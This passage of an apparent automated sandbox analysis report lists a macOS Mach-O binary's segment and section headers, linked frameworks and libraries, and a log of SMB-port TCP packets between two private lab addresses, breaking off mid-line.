addr76448
align2
nreloc0
flags1610612747
offset72352
reserved20
reserved10
size5448
segment_command
NameValue
segname__DATA
fileoff77824
maxprot7
vmsize24576
nsects8
flags0
filesize24576
vmaddr81920
initprot3
Datassectname__dyld
segname__DATA
reloff0
addr81920
align2
nreloc0
flags0
offset77824
reserved20
reserved10
size28
sectname__nl_symbol_ptr
segname__DATA
reloff0
addr81948
align2
nreloc0
flags6
offset77852
reserved20
reserved1126
size180
sectname__la_symbol_ptr
segname__DATA
reloff0
addr82128
align2
nreloc0
flags7
offset78032
reserved20
reserved1171
size504
sectname__const
segname__DATA
reloff0
addr82632
align2
nreloc0
flags0
offset78536
reserved20
reserved10
size8
sectname__cfstring
segname__DATA
reloff0
addr82640
align2
nreloc0
flags0
offset78544
reserved20
reserved10
size32
sectname__data
segname__DATA
reloff0
addr82688
align5
nreloc0
flags0
offset78592
reserved20
reserved10
size19920
sectname__common
segname__DATA
reloff0
addr102624
align5
nreloc0
flags1
offset0
reserved20
reserved10
size428
sectname__bss
segname__DATA
reloff0
addr103052
align2
nreloc0
flags1
offset0
reserved20
reserved10
size24
segment_command
NameValue
segname__OBJC
fileoff102400
maxprot7
vmsize4096
nsects4
flags0
filesize4096
vmaddr106496
initprot3
Datassectname__message_refs
segname__OBJC
reloff0
addr106496
align2
nreloc0
flags5
offset102400
reserved20
reserved10
size116
sectname__cls_refs
segname__OBJC
reloff0
addr106612
align2
nreloc0
flags5
offset102516
reserved20
reserved10
size48
sectname__module_info
segname__OBJC
reloff0
addr106660
align2
nreloc0
flags0
offset102564
reserved20
reserved10
size32
sectname__image_info
segname__OBJC
reloff0
addr106692
align2
nreloc0
flags0
offset102596
reserved20
reserved10
size8
segment_command
NameValue
segname__LINKEDIT
fileoff106496
maxprot7
vmsize9488
nsects0
flags0
filesize9488
vmaddr110592
initprot1
dyld_info_command
NameValue
lazy_bind_size2808
lazy_bind_off107120
weak_bind_size100
rebase_size0
export_off109928
export_size164
bind_off106496
rebase_off0
bind_size524
weak_bind_off107020
symtab_command
NameValue
strsize2812
symoff110092
stroff113172
nsyms155
dysymtab_command
NameValue
extreloff111952
nlocrel0
indirectsymoff111984
modtaboff0
nextrel4
iundefsym4
nmodtab0
ilocalsym0
nundefsym151
nextrefsyms0
locreloff0
ntoc0
nlocalsym1
tocoff0
extrefsymoff0
nindirectsyms297
iextdefsym1
nextdefsym3
dylinker_command
NameValue
name12
Data/usr/lib/dyld
uuid_command
NameValue
uuidgL6T\6.FW
dylib_command
NameValue
compatibility_version0.150.0
timestampThu Jan 01 01:00:02 1970
name24
current_version4864.220.1
Data/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
dylib_command
NameValue
compatibility_version0.44.1
timestampThu Jan 01 01:00:02 1970
name24
current_version6656.165.2
Data/System/Library/Frameworks/Foundation.framework/Versions/C/Foundation
dylib_command
NameValue
compatibility_version0.45.0
timestampThu Jan 01 01:00:02 1970
name24
current_version13824.181.3
Data/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version0.35.141
Data/System/Library/Frameworks/SecurityFoundation.framework/Versions/A/SecurityFoundation
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version512.212.0
Data/System/Library/Frameworks/SystemConfiguration.framework/Versions/A/SystemConfiguration
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version0.1.0
Data/System/Library/PrivateFrameworks/Admin.framework/Versions/A/Admin
dylib_command
NameValue
compatibility_version0.7.0
timestampThu Jan 01 01:00:02 1970
name24
current_version1024.7.0
Data/usr/lib/libstdc++.6.dylib
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version0.1.0
Data/usr/lib/libgcc_s.1.dylib
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version260.111.0
Data/usr/lib/libSystem.B.dylib
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version0.227.0
Data/usr/lib/libobjc.A.dylib
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version0.32.0
Data/System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version0.34.0
Data/System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices

Symbols

Symbol

Network Behavior

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Sep 25, 2014 14:56:32.798506975 MESZ4443874192.168.50.201192.168.50.107
Sep 25, 2014 14:56:32.799374104 MESZ58120274192.168.50.201192.168.50.107
Sep 25, 2014 14:56:33.276830912 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.277481079 MESZ13949162192.168.50.201192.168.50.107
Sep 25, 2014 14:56:33.277503967 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.277589083 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.277874947 MESZ13949162192.168.50.201192.168.50.107
Sep 25, 2014 14:56:33.277892113 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.278018951 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.278377056 MESZ13949162192.168.50.201192.168.50.107
Sep 25, 2014 14:56:33.278377056 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.278682947 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.279126883 MESZ13949162192.168.50.201192.168.50.107
Sep 25, 2014 14:56:33.279143095 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.279275894 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.279556036 MESZ13949162192.168.50.201192.168.50.107
Sep 25, 2014 14:56:33.279571056 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.279740095 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.280011892 MESZ13949162192.168.50.201192.168.50.107
Sep 25, 2014 14:56:33.280014038 MESZ13949162192.168.50.201192.168.50.107
Sep 25, 2014 14:56:33.280021906 MESZ13949162192.168.50.201192.168.50.107
Sep 25, 2014 14:56:33.280038118 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.280087948 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.346189976 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.347368956 MESZ13949162192.168.50.201192.168.50.107
Sep 25, 2014 14:56:33.347393990 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.347564936 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.347896099 MESZ13949162192.168.50.201192.168.50.107
Sep 25, 2014 14:56:33.347909927 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.348026991 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.348325014 MESZ13949162192.168.50.201192.168.50.107
Sep 25, 2014 14:56:33.348334074 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.348507881 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.348819971 MESZ13949162192.168.50.201192.168.50.107
Sep 25, 2014 14:56:33.348831892 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.349752903 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.350080013 MESZ13949162192.168.50.201192.168.50.107
Sep 25, 2014 14:56:33.350095987 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.350183964 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.350434065 MESZ13949162192.168.50.201192.168.50.107
Sep 25, 2014 14:56:33.350446939 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.362411022 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.363003969 MESZ13949162192.168.50.201192.168.50.107
Sep 25, 2014 14:56:33.363035917 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.363202095 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.363687038 MESZ13949162192.168.50.201192.168.50.107
Sep 25, 2014 14:56:33.363706112 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.363797903 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.364135027 MESZ13949162192.168.50.201192.168.50.107
Sep 25, 2014 14:56:33.364146948 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.387892008 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.388115883 MESZ13949162192.168.50.201192.168.50.107
Sep 25, 2014 14:56:33.388139963 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.388220072 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.389025927 MESZ13949162192.168.50.201192.168.50.107
Sep 25, 2014 14:56:33.389159918 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.389506102 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.389801979 MESZ13949162192.168.50.201192.168.50.107
Sep 25, 2014 14:56:33.389812946 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.391033888 MESZ49162139192.168.50.107192.168.50.201
Sep 25, 2014 14:56:33.391318083 MESZ13949162192.168.50.201192.168.50.107
Sep 25, 2014 14:56:33.391319990 MESZ13949162192.168.50.201192.168.50.107
Sep 25, 2014 14:56:33.391320944 MESZ13949162192.168.50.201192.168.50.107
Sep 25, 2014 14:56:33.391335964 MESZ13949162192.168.50.201192.168.50.107
Sep 25, 2014 14:56:33.391336918 MESZ13949162192.168.50.201192.168.50.107
Sep 25, 2014 14:56:33.391339064 MESZ13949162192.168.50.201192.168.50.107
Sep 25, 2014 14:56:33.391340017 MESZ13949162192.168.50.201192.168.50.107
Sep 25, 2014 14:56:33.